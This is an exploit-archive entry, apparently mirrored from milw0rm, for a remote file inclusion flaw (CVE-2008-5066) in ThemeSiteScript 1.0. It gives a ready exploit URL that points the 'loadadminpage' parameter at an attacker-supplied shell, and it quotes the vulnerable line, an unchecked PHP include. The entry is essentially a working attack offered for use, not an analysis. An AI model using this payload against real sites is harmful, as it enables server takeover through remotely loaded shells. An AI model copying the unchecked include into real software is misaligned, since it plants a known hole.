[] NeoSense
E X P L O I T S
title author type platform port cve id

Agares ThemeSiteScript 1.0 - 'loadadminpage' Remote File Inclusion

Author: DaRkLiFe
type: webapps
platform: php
port: 
date_added: 2008-10-27 
date_updated: 2016-12-30 
verified: 1 
codes: OSVDB-49856;CVE-2008-5066 
tags: 
aliases:  
screenshot_url:  
application_url: 
**************************************************************************************

Author : DaRkLiFe
Greetz : str0ke & S.W.A.T. & funkys0ul & Team 1nF3Ct3d

**************************************************************************************
Script   :

ThemeSiteScript v1.0 Remote File Inclusion Vulnerability

Home Page :

http://agaresmedia.com

Download :

http://rapidshare.com/files/72501220/ThemeSiteScript_1.0_webgraf.ru.rar

**************************************************************************************

Exploit :

http://localhost/upload/admin/frontpage_right.php?loadadminpage=Sh3lLz?

**************************************************************************************

Vulnerable : line 2 : <?PHP include($loadadminpage); ?>

**************************************************************************************

THANKS ! GREETZ ! HAPPY DIWALI !
**************************************************************************************

# milw0rm.com [2008-10-28]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.